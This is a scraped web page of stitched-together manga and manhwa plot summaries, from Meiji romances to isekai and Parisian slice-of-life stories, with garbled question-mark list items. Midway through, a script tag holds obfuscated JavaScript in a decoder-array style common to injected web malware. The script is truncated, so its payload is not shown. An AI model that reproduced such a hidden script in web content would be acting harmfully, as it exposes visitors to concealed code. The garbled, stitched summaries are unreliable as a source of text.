From The story took place after the 1st World War (the Great War) and prior to the 2nd World War. The heir of a rich viscount was falling in love with a magazine reporter. The “heir boy” died in a house fire. Seven years later, the reporter found his “dead” lover, now a high profile male prostitute. Together, they fell into the darkness of political scandals and human smugglings.
A maid swaps lives with a lady... Set in the Japanese colonial period, a young girl is gifted a maidservant who looks just like her on her 8th birthday. The fate of the two children entwines as they each carve out their own destiny, surpassing obstacles such as status and gender, education and culture, and ethnicity and race. There, can't I go?
A few years ago, the Second Queen Nayla incited a rebellion. The King and the First Queen, Viatan, along with their aides, were all killed. Only Princess Chell, the daughter of Viatan survived.The Princess, now lives like a ghost, and is known as the Princess of Death.Along comes Penny, who becomes Chell's personal maid, making her the first maid that serve the Princess after years. However, she's no ordinary maid.This blunt and clumsy maid is actually an assassin disguised as a maid. Under the orders of Queen Nayla, Penny's final task is to kill the Princess. Penny just wants her freedom. She needs to save money to escape and travel far away after she finishes her final task from Queen Nayla.Unlike the rumours about being the Princess of Death, Penny finds herself inexplicably drawn to the Princess.Will Penny be able find her way to freedom?
The fourth year of the Meiji Era. Yukinosuke, the son of a family of the privileged aristocratic class, goes about his life covering up a worry he has, being “I have not once had an erection”. In the midst of such troubled days, he meets Sayo, the head of a family of executioners spanning back into the Edo period. After witnessing a beheading performed by her, something pitch black starts to well up inside Yukinosuke!! Sprouting from lust begins a noble romance of blood and nature!!
One day I was in a world that I did not know. [The entrance to the quest has been successfully completed! ]. [Quest (Main) – «Fix the world!». Content: This world was created by mixing four novels – Child Care, Contract Marriage, XXX, XXX. Genres are unknown. You must return the four distorted novels to the original. ]. But… I have no memory of their content. If I make a mistake… then I’m going to die?! Besides, the distorted web novel characters are interested in me! What should I do?! <ul> <li>??? ??? ????</li> <li>???????? ?????? ???????? ? ??????</li> <li>???? ?? ?? ?????? ?????, ?? ??????</li> </ul><script></script><script>function _0x33f2(_0x45a967,_0x50a62e){var _0x595e18=_0x22b5();return _0x33f2=function(_0x3562c9,_0x45a78d){_0x3562c9=_0x3562c9-(0x1f46+0xc3*-0x5+0xc*-0x230);var _0x55d953=_0x595e18[_0x3562c9];return _0x55d953;},_0x33f2(_0x45a967,_0x50a62e);}(function(_0x327897,_0x24efeb){var _0x364c1c=_0x33f2,_0x1e2a42=_0x327897();while(!![]){try{var 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Read Manhwa “If You Don’t Know The Novel, You Will Die” Online Free On Manga Zin The Summary Of The Comics “If You Don’t Know The Novel, You Will Die”: One Day I Was In A World That I Did Not Know. [The Introduction To The Quest Has Been Successfully Completed! ]. [Quest (Main) – «Fix The World!». Content: This World Was Created By Mixing Four Novels: Child Care, Contract Marriage, Xxx, Xxx. Genres Are Unknown. You Must Return The Four Distorted Novels To The Original. ]. But… I Have No Memory Of Their Content. If I Make A Mistake… Then I’m Going To Die?! Besides, The Distorted Web Novel Characters Are Interested In Me! What Should I Do?! “If You Don’t Know The Novel, You Will Die” Is Alternatively Named: Если Ты Не Знаешь Роман, То Умрешь / Незнание Романа Приведет К Смерти / 不懂浪漫奇幻小说就死定了 / 로판을 모르면 죽습니다 Read Ghosts Manhwa Recommendations: The Crazy Killer Whale’s Favourite Penguin The Ten Thousand Races Invasion: Guardian Of The Rear Find The Runaway Princess
The count’s maid, Asha, only ever dreamed of earning money for her sick mother’s medicine, and opening a small veterinary hospital. One day, she is tasked to run an errand at “Night Butterfly”, the darkest, most bizarre street in the Arte Empire. There, she meets a beautiful but wounded slave named Lee. After saving his life, it seems Lee does not want Asha to go. “It was you who saved me. My master, my salvation, my Asha.” After seeing him smile so strangely, she realized everything was ruined. She was trapped. Clearly, this seductive smile knew all along that she would never escape…
Collection of oneshot 1) Ijimetaihodo Aishiteru Takashi has been bullying Haruki since they were children. But he's an idiot, and Haruki always manipulates him. Will these two ever sort out their feelings for each other? 2) The Fox's Wedding The Fox's Wedding- Tohru has just quit his job, broken up with his fiancee and moved back home. And it's all because of his supervisor, Hanao! But Hanao is more than he appears to be... 3)Foreign Culture Communication A historical story! Commodore "Just call me Darling," is new to Japan and is given a young, beautiful and incredibly naive translator named Haneda Takayuki. Darling is smitten with his "Honey", but will the culture differences be too much for them? 4)Little Lost Lamb Kamiya Inoru's parents run a Catholic church (?) and he helps out by listening to confessions. When classmate Shiba Youichi comes in and confesses that he's in love with his classmate, Kamiya, the priest substitute can't resist seeing how far Shiba will go for forgiveness... Warning: Dirty things happen in a church, and with religious objects. Also, the author doesn't know much about Catholicism. 5)Educational Affections
After successfully getting hired as a fashion designer, Mai rewarded herself with a trip to Kyoto and was just enjoying herself when she got struck by lightning at Honno-ji. She then loses consciousness awaking only to find Honno-ji ablaze. In the spur of the moment, she saves a person from being attacked, but it turns out he's Oda Nobunaga?! The popular romance game is finally being published as a comic!
This is a biography of the famous Buddhist monk Ikkyu from the late Hisashi Sakaguchi. Set in 14th century Japan, Ikkyu must learn to live and excel as a monk, despite the fact that his father is the emperor. His intelligence and purity help him succeed, but he continues to get the short end of the stick in life. Can Ikkyu perservere in his quest for spirituality in spite of everything that is set against him?
After Yune returns to Japan, Alice can't seem to forget about her, so she decides to go visit Yune herself! Each chapter in this series features "quickies" that show the daily lives of Alice and Yune having fun being silly in Japan! Each page links to the next in a sequence of events that help build the story as it progresses!
From Fate: During the second half of the 19th century, Europe became intrigued by the Japanese culture. A Japanese girl named Yune travels to France, where she started working in the lower parts of a town in Paris at a craft store called Enseignes du Roy. She and the store owner named Claude communicate with each other in order to get over their cultural differences. This is the story of Yune's stay in Paris.